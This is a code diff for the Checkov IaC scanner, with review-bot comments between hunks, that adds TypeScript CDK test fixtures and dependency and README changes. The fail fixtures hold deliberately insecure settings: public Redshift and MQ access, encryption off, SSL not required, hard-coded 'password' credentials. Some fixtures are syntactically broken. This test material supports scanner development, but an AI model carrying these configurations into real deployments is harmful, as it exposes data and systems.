diff --git a/.github/checkov.yaml b/.github/checkov.yaml
index 88c62f7cb00..5428125e94e 100644
--- a/.github/checkov.yaml
+++ b/.github/checkov.yaml
@@ -21,6 +21,15 @@ skip-path:
 - tests/terraform/runner/tf_plan_skip_check_regex/resource/tfplan1.json
 - tests/terraform/runner/tfplan2.json
 - tests/unit/test_secrets.py
+- tests/terraform/runner/resources/example/example.tf
+- tests/terraform/graph
+- tests/terraform/checks
+- /checkov/secrets/plugins/entropy_keyword_combinator.py
+- /checkov/secrets/plugins/detector_utils.py
+- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/pass.py
+- /cdk_integration_tests/src/python/RedshiftClusterEncryption/pass.py
+- /cdk_integration_tests/src/python/RedshiftClusterEncryption/fail__1__.py
+- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/fail__1__.py
 - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail__2__.py
 - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.py
 - /cdk_integration_tests/src/typescript
diff --git a/Pipfile b/Pipfile
index c1439ae4053..c0cb695ddae 100644
--- a/Pipfile
+++ b/Pipfile
@@ -43,7 +43,7 @@ types-colorama = "<0.5.0,>=0.4.3"
 # REMINDER: Update "install_requires" deps on setup.py when changing
 #
 bc-python-hcl2 = "==0.4.2"
-bc-detect-secrets = "==1.5.9"
+bc-detect-secrets = "==1.5.11"
 bc-jsonpath-ng = "==1.6.1"
 pycep-parser = "==0.4.1"
 tabulate = ">=0.9.0,<0.10.0"
@@ -86,6 +86,7 @@ license-expression = ">=30.1.0,<31.0.0"
 rustworkx = ">=0.13.0,<0.14.0"
 pydantic = ">=2.0.0,<3.0.0"
 botocore = "==1.34.25"
+urllib3 = "*"
 [requires]
 python_version = "3.8"
diff --git a/README.md b/README.md
index 93a036272c0..557b9bf3bec 100644
--- a/README.md
+++ b/README.md
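Review bot: The nine new skip-path entries carry no rationale, and two of them (`tests/terraform/graph`, `tests/terraform/checks`) exclude whole directories from the repository's own secrets scan, whereas every other entry in the list names an individual fixture or source file. Judging by the names, these paths hold strings that look like secrets on purpose (the two `checkov/secrets/plugins` files implement keyword and entropy detection, the CDK files are pass/fail samples), but a directory-wide skip also hides any real credential that later lands in those trees. I would narrow the two directory entries to the offending files and record the reason above the group, e.g. `# self-scan false positives: detector sources and IaC/CDK fixtures with intentional secret-like strings`. The skip-path list begins before this hunk, so the entries above the shown context are not visible here.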
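Review bot: `urllib3 = "*"` in the second Pipfile hunk is the only unbounded specifier in a block where every neighbour is pinned or range-bounded (`botocore = "==1.34.25"`, `pydantic = ">=2.0.0,<3.0.0"`), so the resolver is free to pick any major version, including one whose API differs from whatever prompted the addition. Bound it like its neighbours, e.g. `urllib3 = ">=<MIN>,<<NEXT_MAJOR>"` with the range actually tested (placeholders to fill in). The context line above the first hunk reminds that `install_requires` in setup.py must be updated alongside; neither the `bc-detect-secrets` bump nor the new urllib3 entry is visible there in this diff, so it is worth confirming it was mirrored.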
@@ -15,7 +15,7 @@ **Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages. -It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](docs/7.Scan%20Examples/Helm.md), [Kustomize](docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](docs/7.Scan%20Examples/Dockerfile.md), [Serverless](docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](docs/7.Scan%20Examples/Bicep.md), [OpenAPI](docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning. +It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), 
[OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md) or [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md) and detects security and compliance misconfigurations using graph-based scanning. It performs [Software Composition Analysis (SCA) scanning](docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs). 
@@ -37,21 +37,21 @@ Checkov also powers [**Prisma Cloud Application Security**](https://www.prismacl - [Getting Started](#getting-started) - [Disclaimer](#disclaimer) - [Support](#support) -- [Migration - v2 to v3](docs/1.Welcome/Migration.md) +- [Migration - v2 to v3](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Migration.md) ## Features - * [Over 1000 built-in policies](docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud. + * [Over 1000 built-in policies](https://github.com/bridgecrewio/checkov/blob/main/docs/5.Policy%20Index/all.md) cover security and compliance best practices for AWS, Azure and Google Cloud. * Scans Terraform, Terraform Plan, Terraform JSON, CloudFormation, AWS SAM, Kubernetes, Helm, Kustomize, Dockerfile, Serverless framework, Ansible, Bicep and ARM template files. * Scans Argo Workflows, Azure Pipelines, BitBucket Pipelines, Circle CI Pipelines, GitHub Actions and GitLab CI workflow files * Supports Context-awareness policies based on in-memory graph-based scanning. * Supports Python format for attribute policies and YAML format for both attribute and composite policies. - * Detects [AWS credentials](docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers. + * Detects [AWS credentials](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Scanning%20Credentials%20and%20Secrets.md) in EC2 Userdata, Lambda environment variables and Terraform providers. * [Identifies secrets](https://www.prismacloud.io/prisma/cloud/secrets-security) using regular expressions, keywords, and entropy based detection. * Evaluates [Terraform Provider](https://registry.terraform.io/browse/providers) settings to regulate the creation, management, and updates of IaaS, PaaS or SaaS managed through Terraform. 
- * Policies support evaluation of [variables](docs/2.Basics/Handling%20Variables.md) to their optional default value. - * Supports in-line [suppression](docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI. - * [Output](docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/). + * Policies support evaluation of [variables](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Handling%20Variables.md) to their optional default value. + * Supports in-line [suppression](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Suppressing%20and%20Skipping%20Policies.md) of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI. + * [Output](https://github.com/bridgecrewio/checkov/blob/main/docs/2.Basics/Reviewing%20Scan%20Results.md) currently available as CLI, [CycloneDX](https://cyclonedx.org), JSON, JUnit XML, CSV, SARIF and github markdown and link to remediation [guides](https://docs.prismacloud.io/en/enterprise-edition/policy-reference/). ## Screenshots @@ -172,7 +172,7 @@ Check: "Ensure all data stored in the S3 bucket is securely encrypted at rest" Failed for resource: aws_s3_bucket.sls_deployment_bucket_name ``` -Start using Checkov by reading the [Getting Started](docs/1.Welcome/Quick%20Start.md) page. +Start using Checkov by reading the [Getting Started](https://github.com/bridgecrewio/checkov/blob/main/docs/1.Welcome/Quick%20Start.md) page. ### Using Docker 
@@ -462,13 +462,13 @@ Defaults: Contribution is welcomed!
-Start by reviewing the [contribution guidelines](CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22).
+Start by reviewing the [contribution guidelines](https://github.com/bridgecrewio/checkov/blob/main/CONTRIBUTING.md). After that, take a look at a [good first issue](https://github.com/bridgecrewio/checkov/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22). You can even start this with one-click dev in your browser through Gitpod at the following link: [![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/bridgecrewio/checkov)
-Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](docs/6.Contribution/Contribution%20Overview.md).
+Looking to contribute new checks? Learn how to write a new check (AKA policy) [here](https://github.com/bridgecrewio/checkov/blob/main/docs/6.Contribution/Contribution%20Overview.md). ## Disclaimer `checkov` does not save, publish or share with anyone any identifiable customer information.
diff --git a/cdk_integration_tests/prepare_data.sh b/cdk_integration_tests/prepare_data.sh
index 45417830a62..8d3934facf1 100755
--- a/cdk_integration_tests/prepare_data.sh
+++ b/cdk_integration_tests/prepare_data.sh
@@ -19,9 +19,8 @@
 # fi
 #done
-
-echo "creating report for CDK python"
+echo "creating report for CDK"
 pipenv run checkov -s --framework cdk --repo-id cli/cdk -o json \
- -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json"
+ -d "cdk_integration_tests/src" > "checkov_report_cdk.json"
 #todo: iterate over all the cdk typescript checks - when ts supported in sast
diff --git a/cdk_integration_tests/run_integration_tests.sh b/cdk_integration_tests/run_integration_tests.sh
index c2f5351adee..24d4858dfc8 100755
--- a/cdk_integration_tests/run_integration_tests.sh
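Review bot: The `#todo: iterate over all the cdk typescript checks - when ts supported in sast` context line is now stale, because the scan directory on the line above it changed from `cdk_integration_tests/src/python` to `cdk_integration_tests/src` and therefore already covers the typescript fixtures added in this commit; replace it with `# scans every language directory under cdk_integration_tests/src (python and typescript)` or drop it. The report also changes name from `checkov_report_cdk_python.json` to `checkov_report_cdk.json`; whatever loads it (the `failed_checks` fixture in test_checks_typescript.py yields `report_failed_checks`, but the code that opens the file is outside this diff) has to follow the rename, as does any CI step that archives the old name. The same two-line change appears in run_integration_tests.sh in the next hunk and both points apply there too.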
+++ b/cdk_integration_tests/run_integration_tests.sh
@@ -18,9 +18,9 @@ set_env_vars() {
 }
 prepare_data () {
- echo "creating report for CDK python"
+ echo "creating report for CDK"
 python checkov/main.py -s --framework cdk --repo-id prisma/cdk -o json \
- -d "cdk_integration_tests/src/python" > "checkov_report_cdk_python.json"
+ -d "cdk_integration_tests/src" > "checkov_report_cdk.json"
 }
diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts
index 0302a9c123a..7d297878ad3 100644
--- a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts
+++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/fail.ts
@@ -6,7 +6,7 @@ class ALBListenerHTTPSStack extends Stack {
 constructor(scope: Construct, id: string, props?: StackProps) {
 super(scope, id, props);
- new elbv2.CfnLoadBalancer(this, {})
+ new elbv2.CfnListener(this, {})
 }
 }
diff --git a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts
index ca091deeb80..ce4c92e42e2 100644
--- a/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts
+++ b/cdk_integration_tests/src/typescript/ALBListenerHTTPS/pass.ts
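Review bot: After the rename to `CfnListener`, the fail fixture still exercises only the empty-props case `new elbv2.CfnListener(this, {})`, while pass.ts in the next hunk lists six protocol variants; the most common insecure value, an explicit plain-HTTP listener, is never asserted to fail. I would add `new elbv2.CfnListener(this, {protocol: 'HTTP'})` as a second failing construct, adjusting the file name if the harness derives the expected finding count from a `__N__` suffix as the other fixtures in this diff appear to. The `elbv2` import and the enclosing stack class begin outside the hunk.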
@@ -6,12 +6,12 @@ class ALBListenerHTTPSStack extends Stack {
 constructor(scope: Construct, id: string, props?: StackProps) {
 super(scope, id, props);
- new elbv2.CfnLoadBalancer(this, {protocol: 'HTTPS'})
- new elbv2.CfnLoadBalancer(this, {protocol: 'TLS'})
- new elbv2.CfnLoadBalancer(this, {protocol: 'TCP'})
- new elbv2.CfnLoadBalancer(this, {protocol: 'UDP'})
- new elbv2.CfnLoadBalancer(this, {protocol: 'TCP_UDP'})
- new elbv2.CfnLoadBalancer(this, {defaultActions: [{type: 'redirect', redirectConfig:{protocol: 'HTTPS'}}]})
+ new elbv2.CfnListener(this, {protocol: 'HTTPS'})
+ new elbv2.CfnListener(this, {protocol: 'TLS'})
+ new elbv2.CfnListener(this, {protocol: 'TCP'})
+ new elbv2.CfnListener(this, {protocol: 'UDP'})
+ new elbv2.CfnListener(this, {protocol: 'TCP_UDP'})
+ new elbv2.CfnListener(this, {defaultActions: [{type: 'redirect', redirectConfig:{protocol: 'HTTPS'}}]})
 }
 }
diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts
index b3ca34937f0..51042e67b97 100644
--- a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts
+++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/fail.ts
@@ -5,9 +5,7 @@ import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
 class AmazonMQBrokerPublicAccessStack extends Stack {
 constructor(scope: Construct, id: string, props?: StackProps) {
 super(scope, id, props);
-
- new elbv2.CfnBroker(this, {})
- new elbv2.CfnBroker(this, {publiclyAccessible: false})
+ new elbv2.CfnBroker(this, {publiclyAccessible: true})
 }
 }
diff --git a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts
index 7b2f4b21999..e9da3de07b5 100644
--- a/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts
+++ b/cdk_integration_tests/src/typescript/AmazonMQBrokerPublicAccess/pass.ts
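Review bot: The new line `new elbv2.CfnBroker(this, {publiclyAccessible: true})` builds the broker through the `aws_elasticloadbalancingv2` alias shown in the hunk header, but `CfnBroker` is the Amazon MQ L1 construct (`aws_amazonmq` in aws-cdk-lib), so the fixture is not valid against the library; if the typescript policy resolves the constructor through its import rather than by bare class name, this case will never match and the test passes vacuously. Import `aws_amazonmq as amazonmq` and write `new amazonmq.CfnBroker(this, {publiclyAccessible: true})`; pass.ts in the next hunk carries the same import. Note also that the test driving this fixture, `test_CKV_AWS_131_AmazonMQBrokerPublicAccess` in test_checks_typescript.py, now passes `check_id="CKV_AWS_69"` while keeping `131` in its name, which will confuse anyone mapping failures back to policies.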
@@ -5,8 +5,8 @@ import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
 class AmazonMQBrokerPublicAccessStack extends Stack {
 constructor(scope: Construct, id: string, props?: StackProps) {
 super(scope, id, props);
-
- new elbv2.CfnBroker(this, {publiclyAccessible: true})
+ new elbv2.CfnBroker(this, {})
+ new elbv2.CfnBroker(this, {publiclyAccessible: false})
 }
 }
diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts
new file mode 100644
index 00000000000..0a4c784e132
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to missing Multi-AZ setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc
+ // missing Multi-AZ setting
+});
diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts
new file mode 100644
index 00000000000..77af0d727c9
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to missing Multi-AZ setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc,
+ multiAZ: true
+});
diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..d125920e0f8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts
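Review bot: RDSMultiAZEnabled/pass.ts keeps the fail fixture's header `// SINK: Vulnerability found due to missing Multi-AZ setting` verbatim even though the construct below sets `multiAZ: true` and is expected to produce no finding; the same copied header sits in the pass fixtures of RedshiftClusterEncryption, RedshiftClusterLogging, RedshiftClusterPubliclyAccessible, S3BlockPublicACLs and S3BlockPublicPolicy later in this diff. Anyone grepping fixtures for expected findings is misled; change it to `// SINK: compliant - multiAZ is set, no finding expected` and the equivalent in the others. The new fixtures also reference `stack`, `ec2` and `vpc` without declaring them and alternate between `// SOURCE` and `// FINDING` headers; if that is intentional because the checkov parser only needs the constructor call, one line saying so at the top of each file would save the next reader from trying to compile them.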
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc
+ // publicly accessible setting missing
+});
diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..07d46be962d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts
@@ -0,0 +1,8 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc, publicly_accessible: true
+});
diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts
new file mode 100644
index 00000000000..c9758978076
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts
@@ -0,0 +1,19 @@
+// FINDING
+import { CfnClusterParameterGroup } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to Redshift not using SSL
+new CfnClusterParameterGroup(stack, 'MyClusterParameterGroup', {
+ description: 'Parameter group for my Redshift cluster',
+ family: 'redshift-1.0',
+ parameters: {
+ require_ssl: 'false', // This should be 'true' to enforce SSL
+ },
+});
+new CfnClusterParameterGroup(stack, 'MyClusterParameterGroup', {
+ description: 'Parameter group for my Redshift cluster',
+ family: 'redshift-1.0',
+ parameters: {
+ random_param: 100
+ },
+});
\ No newline at end of file
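Review bot: RDSPubliclyAccessible/pass.ts sets `vpc, publicly_accessible: true`, which is the insecure value under a snake_case key; the CDK `DatabaseInstance` prop is `publiclyAccessible`, so this case presumably only "passes" because the policy never sees the attribute, not because the instance is private, and a policy that later normalises key casing would flip the test. Write the compliant value under the real prop name, `vpc, publiclyAccessible: false`. fail.ts in the preceding hunk relies solely on the prop being absent; if the policy is meant to flag an explicit `true` as well, add a second `new DatabaseInstance(...)` there with `publiclyAccessible: true` so the direct misconfiguration is covered.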
diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts
new file mode 100644
index 00000000000..b5889acc482
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts
@@ -0,0 +1,9 @@
+import { CfnClusterParameterGroup } from '@aws-cdk/aws-redshift';
+
+new CfnClusterParameterGroup(stack, 'MyClusterParameterGroup', {
+ description: 'Parameter group for my Redshift cluster',
+ family: 'redshift-1.0',
+ parameters: {
+ require_ssl: 'true', // This should be 'true' to enforce SSL
+ },
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail.ts
new file mode 100644
index 00000000000..05a28ade2fb
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail.ts
@@ -0,0 +1,12 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing encryption at rest
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc, encrypted: false
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts
new file mode 100644
index 00000000000..e3bb55c194b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts
@@ -0,0 +1,19 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing encryption at rest
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc, encrypted: true
+});
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts
new file mode 100644
index 00000000000..2ba5ef3a2be
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts
@@ -0,0 +1,13 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing logging enabled
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc
+ // logging enabled missing
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts
new file mode 100644
index 00000000000..b3dc48a7820
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts
@@ -0,0 +1,15 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing logging enabled
+let bucketName;
+let stack;
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ logging_properties: Cluster.LoggingPropertiesProperty = {bucketName: 'name'}
+ // logging enabled missing
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..2f3cd26fb8c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts
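Review bot: In RedshiftClusterLogging/pass.ts, `logging_properties: Cluster.LoggingPropertiesProperty = {bucketName: 'name'}` is not a valid object-literal member (a type annotation plus an assignment inside `{ }`), uses a snake_case key, and names `Cluster.LoggingPropertiesProperty`, which I don't believe exists on the L2 `Cluster` (that nested type belongs to `CfnCluster`); whether this fixture passes therefore depends on how much of the file the checkov TypeScript parser tolerates rather than on the setting being present. As far as I know the L2 prop is `loggingProperties` with `loggingBucket` and `loggingKeyPrefix`, so the compliant case should read `loggingProperties: { loggingBucket: bucket, loggingKeyPrefix: 'name' }`, or target `CfnCluster` explicitly with `loggingProperties: { bucketName: 'name' }` if the policy mirrors the CloudFormation attribute. The trailing `// logging enabled missing` comment and the unused `let bucketName; let stack;` declarations contradict a pass fixture and should go.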
@@ -0,0 +1,13 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible cluster
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc,
+ publiclyAccessible: true, // publicly accessible cluster
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..26fb3b30ba5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts
@@ -0,0 +1,20 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible cluster
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc,
+ publiclyAccessible: false,
+});
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts
new file mode 100644
index 00000000000..b0c7319bae7
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts
@@ -0,0 +1,12 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to Redshift cluster deployed outside of a VPC
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc: vpc
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts
new file mode 100644
index 00000000000..7aefe9c0d19
--- /dev/null
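Review bot: The RedshiftInEc2ClassicMode/fail.ts header says `// SINK: Vulnerability found due to Redshift cluster deployed outside of a VPC`, yet the construct passes `vpc: vpc`, and the pass fixture in the next hunk differs only by adding `clusterSubnetGroupName: 'name'`; the policy evidently keys on the subnet group name rather than on the VPC prop, so the comment describes the wrong condition. Replace it with `// SINK: expected finding - clusterSubnetGroupName is not set (the policy keys on the subnet group, not on vpc)`. As I read the L2 `Cluster`, it requires a VPC and provisions its own subnet group, so a line in the fixture noting that this mirrors the CloudFormation-level attribute rather than a state the L2 construct can reach would also help, if that is the intent.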
+++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts
@@ -0,0 +1,12 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc: vpc,
+ clusterSubnetGroupName: 'name'
+});
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__2__.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__2__.ts
new file mode 100644
index 00000000000..2068b290294
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__2__.ts
@@ -0,0 +1,11 @@
+// FINDING
+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public ACLs
+new Bucket(stack, 'MyBucket', {
+ blockPublicAcls: false, // This should be 'true' to block public ACLs
+});
+new Bucket(stack, 'MyBucket', {
+ random_param: 'true'
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts
new file mode 100644
index 00000000000..a147d859ad5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts
@@ -0,0 +1,8 @@
+// FINDING
+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public ACLs
+new Bucket(stack, 'MyBucket', {
+ blockPublicAcls: true, // This should be 'true' to block public ACLs
+});
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts
new file mode 100644
index 00000000000..dee086f3e1c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts
@@ -0,0 +1,8 @@
+// FINDING
